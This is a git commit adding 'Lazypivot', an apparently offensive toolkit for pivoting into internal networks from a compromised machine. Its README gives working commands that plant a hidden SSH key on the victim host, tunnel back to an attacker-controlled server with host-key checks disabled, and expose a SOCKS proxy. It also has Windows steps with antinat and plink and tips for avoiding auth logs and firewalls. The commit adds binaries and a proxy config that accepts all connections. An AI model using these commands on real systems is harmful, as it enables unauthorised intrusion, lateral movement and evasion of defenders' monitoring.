commit 9807d3fcb52c44557c4e79803e43b947047797fe
Author: Giulio <giulio@gmx.com>
Date:   Sat Dec 14 19:54:14 2019 +0100

    fast release

diff --git a/Readme.md b/Readme.md
new file mode 100644
index 0000000..04d95aa
--- /dev/null
+++ b/Readme.md
@@ -0,0 +1,61 @@
+# Lazypivot
+Making pivoting into internal networks easier and faster so you can focus on the real fun :)
+
+## Principles
+The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
+A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
+
+## Linux
+### Simpler
+On our server 
+```
+useradd -m -s /bin/nologin targetname
+ssh-keygen -t ecdsa -f /tmp/sshkey  -q -N ""
+mkdir /home/targetname/.ssh
+cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
+chown -R targetname:targetname /home/targetname/.ssh
+chmod 600 /home/targetname/.ssh/authorized_keys
+cat /tmp/sshkey
+```
+
+Copy the content of /tmp/sshkey
+
+On the compromised host
+
+```
+echo "my copied sshkey" >> /tmp/.keyfile
+chmod 600 /tmp/.keyfile
+ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
+```
+
+Now on your server
+
+```
+ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
+```
+
+### Stealthier
+We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
+
+Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
+## Windows
+
+Upload the package and extract it with 7z.exe.
+
+Start the antinat binary, no admin permissions are required:
+
+```
+antinat.exe -a -cantinat.xml
+```
+
+Forward the antinat port with plink:
+
+```
+plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
+```
+
+
+## Tips
+
+ * Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
+ * [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)
diff --git a/linux/Readme.md b/linux/Readme.md
new file mode 100644
index 0000000..b50e84e
--- /dev/null
+++ b/linux/Readme.md
@@ -0,0 +1 @@
+Antinat linux build TODO
diff --git a/windows/antinat.dll b/windows/antinat.dll
new file mode 100755
index 0000000..3fdce3d
Binary files /dev/null and b/windows/antinat.dll differ
diff --git a/windows/antinat.exe b/windows/antinat.exe
new file mode 100755
index 0000000..b909abc
Binary files /dev/null and b/windows/antinat.exe differ
diff --git a/windows/antinat.xml b/windows/antinat.xml
new file mode 100755
index 0000000..46c67c4
--- /dev/null
+++ b/windows/antinat.xml
@@ -0,0 +1,20 @@
+<?xml version='1.0'?>
+<antinatconfig>
+	<!-- Any interface -->
+	<interface value='127.0.0.1'/>
+
+	<!-- Port to listen on -->
+	<port value='32768'/>
+
+	<!-- What security methods do we offer clients? -->
+	<authchoice>
+		<select mechanism='anonymous'/>
+		<select mechanism='chap'/>
+		<select mechanism='cleartext'/>
+	</authchoice>
+
+	<!-- Which connections should we accept or reject? -->
+	<filter>
+		<accept/>
+	</filter>
+</antinatconfig>
diff --git a/windows/plink.exe b/windows/plink.exe
new file mode 100755
index 0000000..6c31f53
Binary files /dev/null and b/windows/plink.exe differ
diff --git a/windows/upload.zip b/windows/upload.zip
new file mode 100644
index 0000000..32d5571
Binary files /dev/null and b/windows/upload.zip differ